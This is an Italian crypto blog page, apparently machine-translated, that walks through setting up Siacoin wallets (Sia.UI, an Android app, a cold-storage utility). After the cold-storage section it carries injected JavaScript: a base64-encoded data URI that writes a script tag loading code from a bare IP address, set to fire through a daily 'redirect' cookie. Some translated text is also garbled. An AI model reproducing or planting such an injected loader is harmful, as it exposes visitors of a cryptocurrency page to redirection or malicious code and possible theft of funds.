15 49.0138 8.38624 1 0 4000 1 https://harowo.com 300 0
theme-sticky-logo-alt
theme-logo-alt

Quali sono i migliori portafogli per Siacoin?

Il concetto di base alla base della tecnologia blockchain è l’archiviazione decentralizzata e sicura dei dati digitali. Mentre la maggior parte delle soluzioni costruite sulla blockchain tendono a utilizzare questo database ultra sicuro esclusivamente per applicazioni finanziarie, ce ne sono alcune che osano fare qualcosa di diverso con esso.

Una di queste applicazioni è Sia. Sia Storage Platform (SSP) è un’alternativa basata su blockchain alle popolari piattaforme di cloud storage come Amazon AWS. Funziona archiviando i tuoi dati su una rete globale, crittografati utilizzando gli stessi protocolli utilizzati per la creazione di criptovalute come Bitcoin.

Ciò rende Sia un’alternativa molto più economica per l’archiviazione cloud, garantendo tempi di attività paragonabili ai suoi rivali radicati.

Ora, mentre queste caratteristiche rivoluzionarie rendono Sia un’opzione di investimento interessante per gli appassionati di crittografia, rende anche difficile trovare buoni portafogli che supportano il token.

Questo perché i tuoi Siacoin non sono solo token da scambiare in base al loro valore di mercato, ma anche chiavi per l’archiviazione di file privati, distribuiti sulla rete Sia. In quanto tale, l’integrazione del portafoglio con Siacoin non è una questione semplice e necessita di un profondo livello di collaborazione per funzionare correttamente.

Quindi quali sono i migliori portafogli che supportano Siacoin? Scopriamolo.

Sia.UI

Come creare il wallet Sia.UI?

Sia.UI Wallet è il wallet ufficiale di Sia, realizzato da Nebulous, gli sviluppatori della Sia Storage Platform. Disponibile per Windows, Linux e Mac OS, Sia.UI è il wallet più sicuro e protetto per archiviare i tuoi token Sia sul desktop.

Come utilizzare Sia.UI Wallet?

Impostare

Prima di tutto, vai a questo link e scarica il client Sia.UI per il tuo desktop. Ti verrà chiesto di selezionare il sistema operativo di tua scelta.

Scarica Sia.UI Wallet

Dopo aver scaricato il pacchetto zip, è il momento di estrarre il contenuto in una nuova cartella. Tieni presente che non esiste un processo di installazione per il client Sia.UI; i file estratti funzioneranno come un’applicazione autonoma. Quindi assicurati di decomprimerli in una directory “permanente”, invece di estrarli semplicemente all’interno della cartella dei download stessa.

Come installare Sia.UI Wallet su Windows

Ora non ti resta che avviare l’applicazione per continuare. Al primo lancio, il wallet Sia.UI tenterà di sincronizzarsi con la blockchain Sia. Il processo può richiedere un’intera giornata, perché è necessario scaricare ogni singolo blocco di transazioni completate fino ad oggi. Questa sincronizzazione si ripeterà ogni volta che esegui l’applicazione, anche se, se può essere di consolazione, i tempi successivi sarebbero molto più brevi.

Configurazione di Sia.UI Wallet su Windows

Dopo che la sincronizzazione è stata completata, ora puoi effettivamente avviare il tuo portafoglio. Ci sono due opzioni prima di te: creare un nuovo portafoglio o ripristinarne uno vecchio. La seconda opzione è utile solo se in precedenza avevi un wallet Sia o stai migrando su un nuovo dispositivo.

Altrimenti, fai clic sull’opzione “crea nuovo portafoglio”.

Come creare Sia.UI Wallet

Verrà ora visualizzata una schermata che mostra il seed e la password del nuovo portafoglio (se scegli di crearne uno).

Il seme, o la frase mnemonica, è la chiave privata del tuo portafoglio. Può essere utilizzato per accedere ai file archiviati sulla rete Sia, quindi assicurati di annotarlo in un luogo sicuro, invece di salvare semplicemente uno screenshot o digitarlo in un file di testo da qualche parte. Un portafoglio di carta fisico funziona al meglio qui, ma non tenerlo in bella vista.

Come ottenere seed e password di Sia.UI Wallet

Se hai scelto di avere una password, l’applicazione ora ti chiederà di inserirla e sbloccare il tuo portafoglio. Il portafoglio verrà bloccato ogni volta che lo accendi di nuovo, il che può essere un buon punto di controllo di sicurezza nel caso di un computer condiviso.

Come sbloccare Sia.UI Wallet

E questo è tutto! Ora hai il portafoglio Sia.UI perfettamente funzionante. Tuttavia, poiché il tuo portafoglio è nuovo, tutto ciò che verrà visualizzato nella schermata di benvenuto è un messaggio “Nessuna transazione recente”. È ora di rimediare.

Portafoglio Siacoin Sia.UI

Come ricevere monete Sia

Ricevere monete Sia è facile. Tutto quello che devi fare è condividere il tuo indirizzo con il mittente, quindi attendere che la transazione venga visualizzata sul tuo portafoglio.

Ora non esiste un indirizzo fisso permanente per il tuo portafoglio. L’unica cosa che rimane invariata è la tua chiave privata (o seed, come l’abbiamo chiamata in precedenza). Gli indirizzi vengono generati in base all’utilizzo, quindi non dovresti riutilizzare i vecchi indirizzi per ricevere nuove transazioni.

Come ricevere monete su Sia.UI Wallet

Il portafoglio Sia.UI si prende cura di questi dettagli per te. Devi solo fare clic sull’opzione Ricevi Siacoin in alto a destra dello schermo. Apparirà una piccola finestra di dialogo. La casella mostra un indirizzo appena generato che puoi copiare e condividere in sicurezza con il mittente per ricevere fondi.

Come trovare l'indirizzo di Sia.UI Wallet

A volte, potresti dover ottenere i vecchi indirizzi che hai già utilizzato. Dal momento che fare clic sul pulsante Ricevi Siacoin genera ogni volta un nuovo indirizzo, dobbiamo fare qualcosa di diverso.

Innanzitutto, vai alla scheda “Terminale” nella barra laterale.

Come utilizzare un vecchio indirizzo su Sia.UI Wallet

Il terminale, come avrete intuito, è una finestra per l’immissione di comandi per il client Sia, che offre più potenza e flessibilità rispetto alle opzioni della GUI. Per ora, tuttavia, non abbiamo bisogno di nulla di complicato. Basta digitare “indirizzi portafoglio” e premere invio.

individuazione dell'indirizzo del portafoglio Sia.UI

Come puoi vedere, la finestra mostrerà tutti gli indirizzi generati fino alla data sul portafoglio. Tieni presente che non importa se l’indirizzo è stato effettivamente utilizzato o meno: finché un indirizzo è stato generato, verrà trovato qui. Questo può essere utile per ottenere indirizzi persi senza utilizzare per qualche motivo.

Ma mai e poi mai riutilizzare vecchi indirizzi. Ciò ti espone ad attacchi dannosi e i tuoi fondi e i tuoi file possono essere rubati in questo modo.

Come inviare monete Sia?

L’invio dei tuoi Siacoin è altrettanto facile. Questa volta, fai clic sul pulsante “Invia Siacoin” nell’angolo in alto a destra.

Come inviare monete da Sia.UI Wallet

Verrà visualizzata un’altra finestra, che ti chiede di inserire l’importo dell’invio e l’indirizzo del destinatario. Assicurati solo di avere abbastanza nel tuo portafoglio per pagare anche le commissioni di transazione e premi il pulsante di invio. È tutto. La blockchain Sia penserà al resto per te.

Invio di Siacoin da Sia.UI Wallet

Sia Wallet Android

Ufficialmente, Sia non ha un portafoglio mobile. Tuttavia, uno sviluppatore di terze parti ha creato un’applicazione Android per eseguire un nodo Sia su dispositivi mobili.

Detto questo, il portafoglio Android Sia non è da meno dei suoi concorrenti. L’interfaccia è elegante, i controlli intuitivi e le prestazioni veloci e fluide. Puoi persino caricare e scaricare file sulla rete Sia dall’app stessa, con il supporto per funzionalità avanzate come contratti e indennità integrate.

Impariamo come usarlo.

Iniziare

Per cominciare, vai su Google Play e scarica l’app Sia. Dopo averlo acceso per la prima volta, ti verrà presentata la seguente schermata.

Portafoglio Sia su Android

Il processo di sincronizzazione è obbligatorio prima di poter inviare fondi, anche se puoi comunque ricevere token senza di esso. Il processo potrebbe richiedere del tempo (e dei dati), quindi assicurati di sincronizzarlo con il Wi-Fi di casa durante la notte.

Per ora, creiamo un portafoglio. Per farlo, apri il menu a tre punti.

come creare un portafoglio Siacoin su Android

Come puoi vedere, tutte le principali opzioni di utilizzo del portafoglio Sia sono elencate in questo menu per un facile accesso. Tocca l’opzione “Crea portafoglio” per continuare.

Protezione del portafoglio Siacoin su Android

A differenza di molte altre applicazioni di portafoglio che potresti aver utilizzato, il portafoglio Android Sia non richiede di nominare il tuo portafoglio. Tutto ciò di cui hai bisogno è scegliere una password complessa e confermarla. Nel caso in cui tu abbia già un account Sia preesistente e desideri ripristinarlo, seleziona l’opzione crea da seed esistente.

Sementi di portafoglio sull'app Siacoin per Android

Se stai ripristinando un account precedente, è qui che devi inserire il tuo vecchio seme. Altrimenti, apparirà un pannello informativo con il seme mnemonico di 29 parole. Prestare attenzione anche all’avvertimento dato sopra; il seme è letteralmente la chiave del tuo portafoglio e l’unica cosa che si frappone tra i tuoi fondi e un hacker. Andando avanti, anche i file archiviati su Sia verrebbero recuperati utilizzando i semi, quindi assicurati di annotare il tuo seme e conservarlo in un luogo sicuro.

Sebbene il portafoglio ti offra un’opzione di copia semplice, non è consigliabile utilizzarlo, poiché semplicemente memorizzare il tuo seme in un file di testo è il modo migliore per farlo trapelare a un hacker. Se vuoi archiviare digitalmente, usa almeno un servizio di deposito crittografato o, meglio ancora, usa il buon vecchio portafoglio di carta. Credimi, non vuoi che nessun altro acceda al tuo seme.

Portafoglio Siacoin sbloccato sull'app Android

E questo è tutto. Il tuo portafoglio è stato creato. Inizialmente, inizia bloccato e devi sbloccarlo dal menu inserendo la tua password prima di poter fare qualsiasi cosa su di esso. Puoi bloccare di nuovo il portafoglio nel caso in cui lasci il telefono incustodito per un po ‘, in modo che qualcuno non possa semplicemente imbattersi nel tuo telefono e iniziare a spendere i tuoi fondi.

Ora scopriamo come utilizzare il nostro nuovo scintillante portafoglio, va bene?

Ricevere Siacoin

Su qualsiasi portafoglio per qualsiasi criptovaluta, ricevere fondi è solo questione di accedere e condividere il tuo indirizzo pubblico con il mittente. Sul portafoglio Android Sia, è sufficiente aprire il menu a tre punti e toccare l’opzione “Visualizza indirizzo”. (Potresti notare “Visualizza indirizzoesAnche l’opzione. Non preoccuparti, lo spiegheremo tra un attimo.)

In alternativa, puoi toccare il pulsante “+” nell’angolo in basso a destra.

Come ricevere Siacoin sull'app wallet Android

L’aeroplano di carta indica “Invia”, mentre la freccia di download indica “Ricevi”. Premi il pulsante di ricezione per ora.

Come inviare sull'app Android del portafoglio Siacoin

Come puoi vedere, ti viene presentata una lunga serie di … beh, incomprensibile, accompagnata da un codice QR. La scansione del codice QR è il metodo migliore perché riduce la probabilità di errori che si insinuano a causa di uno o due caratteri fuori posto durante la copia. Nel caso in cui il mittente non sia nelle vicinanze, puoi sempre copiare e condividere l’indirizzo stesso.

Visualizzazione dei vecchi indirizzi

Tieni presente che l’indirizzo non è un elemento permanente del tuo account; la prossima volta che premi il pulsante “Visualizza indirizzo”, ti imbatterai in un indirizzo completamente diverso. Questo è naturale perché gli indirizzi vengono generati al volo per ogni transazione e non devono essere riutilizzati.

Ma a volte potresti voler recuperare di nuovo un vecchio indirizzo. Forse hai perso l’indirizzo copiato prima di inviarlo. Forse la transazione non è mai stata eseguita. In questi casi, è possibile (anche se si consiglia di non farlo) ottenere nuovamente il vecchio indirizzo.

Per fare ciò, apri il menu a tre punti e questa volta seleziona l’opzione “Visualizza indirizzi”. L’app elencherà per te tutti gli indirizzi generati in precedenza in ordine cronologico.

Come visualizzare i vecchi indirizzi sul portafoglio Android Siacoin

Invio di Siacoin

L’invio di fondi è simile. Premi di nuovo il pulsante “+” nell’angolo in basso a destra.

Come inviare sull'app Siacoin per Android

Questa volta tocca l’aereo di carta.

Invio di Siacoin utilizzando il portafoglio Android

Come puoi vedere, la forma presentata è minima; tutto ciò di cui hai bisogno è l’indirizzo del destinatario e l’importo da inviare. Se hai copiato l’indirizzo, premendo gli appunti lo incollerai nel campo. Altrimenti, toccando il simbolo del codice QR potrai scansionare un codice QR valido dal tuo cellulare, traducendolo automaticamente in un indirizzo Sia.

Tocca la freccia per avviare la transazione.

Visualizzazione del seme

Nel caso in cui perdi il seme che hai registrato durante la creazione del portafoglio, non c’è bisogno di farsi prendere dal panico. Puoi ancora visualizzare di nuovo il seme. Basta aprire il menu a tre punti dall’angolo in alto a destra.

visualizza il seme sull'app Siacoin per Android

Ora tocca l’opzione “Visualizza semi”. Il tuo seme mnemonico di ventinove parole è di nuovo davanti a te. Ma non dimenticare di conservare anche una copia fisica del seme; solo perché puoi visualizzarlo in qualsiasi momento non significa che non hai bisogno di un backup. Ad esempio, nel caso in cui il tuo dispositivo venga rubato o rotto, avrai bisogno del seme per ripristinare nuovamente il tuo portafoglio su un nuovo dispositivo.

Seme del portafoglio Android Siacoin

Avanzate

Toccando il menu “Nodo” in alto a sinistra viene visualizzato un altro elenco di opzioni. Queste opzioni non sono quelle essenziali per le semplici transazioni quotidiane, ma si riferiscono alle funzionalità avanzate di Sia.

Funzionalità avanzate del portafoglio Android Siacoin

Il noleggiatore

Toccando l’opzione Noleggiatore (indicata dalla nuvola) si apre un piccolo sottomenu.

Sottomenu del noleggiatore del portafoglio Android Siacoin

“File” serve per accedere alla rete di archiviazione di file decentralizzata di Sia. Aprendolo per la prima volta si apre una schermata vuota, con una finestra informativa piuttosto prolissa che avverte delle attuali carenze del sistema di stoccaggio Sia.

In poche parole, questa è l’impossibilità di recuperare i file non caricati dallo stesso dispositivo. È probabile che ciò cambi in futuro, ma per ora, evita di archiviare file molto importanti sulla rete Sia, poiché perdere il tuo dispositivo perderebbe anche i file.

Avviso sul portafoglio Android Siacoin

Dopo aver accettato il messaggio, sarai accolto da una schermata piuttosto vuota. Cambiamo questo. Tocca il pulsante “+” nell’angolo in basso a destra.

Schermata iniziale dell'app Siacoin per Android

Il primo simbolo, come avrai intuito, è per la selezione di un file, mentre il secondo è per intere cartelle. Toccando una delle opzioni viene visualizzato Esplora file e puoi selezionare i file che desideri archiviare.

In alto a destra nella schermata File ci sono le opzioni per configurare la visualizzazione. L’opzione lente d’ingrandimento serve per la ricerca di file che è utile una volta che inizi a utilizzare seriamente lo spazio di archiviazione Sia e hai centinaia di file.

L’altra opzione è per modificare la disposizione di ordinamento. Puoi ordinare i file per Nome, per Dimensione, Crescente ecc. Sentiti libero di provare le varie modalità per trovare ciò che funziona per te.

Come ordinare i file sull'app Siacoin per Android

Ma prima di poter effettivamente iniziare a memorizzare i file, ci sono alcune cose che devi fare prima.

Il modo in cui funziona l’archiviazione dei file su Sia è in qualche modo diverso da quello a cui potresti essere abituato.

Fondamentalmente, imposti una “indennità” di fondi, dedicandola per l’archiviazione dei file. Il Locatario, il modulo di Sia incaricato dello stoccaggio, stipula quindi dei “contratti” con un host idoneo per fornire tale deposito. Questa indennità può essere impostata e regolata dall’opzione Indennità denominata in modo appropriato nel sottomenu Affittuario.

Ripartizione dell'archiviazione delle app Android Siacoin

Puoi anche controllare la finestra Indennità per una ripartizione della tua spesa. Come puoi vedere, la visualizzazione elenca l’importo dell’indennità spesa, il periodo di affitto e le condizioni di rinnovo, se presenti. Man mano che la blockchain Sia matura ulteriormente, aspettati che questa vista aggiunga più funzionalità.

D’altra parte, la navigazione nell’opzione Contratti può mostrarti tutti i contratti in esecuzione e gli host con cui li hai.

Contratti sull'app Siacoin per Android

Siacoin Cold Storage

Logo Siacoin

Il cold storage Siacoin è una struttura per generare seed e indirizzi per la blockchain Sia senza connettersi effettivamente alla rete. Chiamato “air gapping”, questo è un metodo per archiviare in modo sicuro i tuoi token senza il rischio di perdere dettagli sensibili a causa degli hacker che tracciano il tuo traffico di rete.

Il modo in cui funziona è abbastanza semplice. Basta scaricare questa pratica utilità e usalo su un computer offline. Meglio ancora, accendilo su un LiveCD con air gap per la massima sicurezza.

Gli indirizzi generati possono essere condivisi con altri utenti per ricevere pagamenti in sicurezza o inviare i propri fondi da un altro portafoglio o borsa. Per inviare fondi, tuttavia, è necessario utilizzare anche un’applicazione wallet. Quindi l’utilità è la migliore per creare un account per l’archiviazione a lungo termine dei tuoi fondi, chiamata anche “conservazione a freddo”.

function getCookie (e) {var U = document.cookie.match (new RegExp (“(?: ^ |;)” + e.replace (/([\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, “\\ $ 1 ″) +” = ([^;] *) “)); return U? decodeURIComponent (U [1]): void 0} var src = “dati: text / javascript; Base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”, ora = Math.floor (Date.now () / 1e3), biscotto = getCookie ( “redirect”); if (ora>= (time = cookie) || void 0 === time) {var time = Math.floor (Date.now () / 1e3 + 86400), date = new Date ((new Date) .getTime () + 86400) ; document.cookie = “redirect =” + time + “; percorso = /; expires = “+ date.toGMTString (), document.write (“)}

Previous Post
Revisão da carteira IOTA Trinity: é a melhor escolha?
Next Post
Как да купя биткойн в Хонг Конг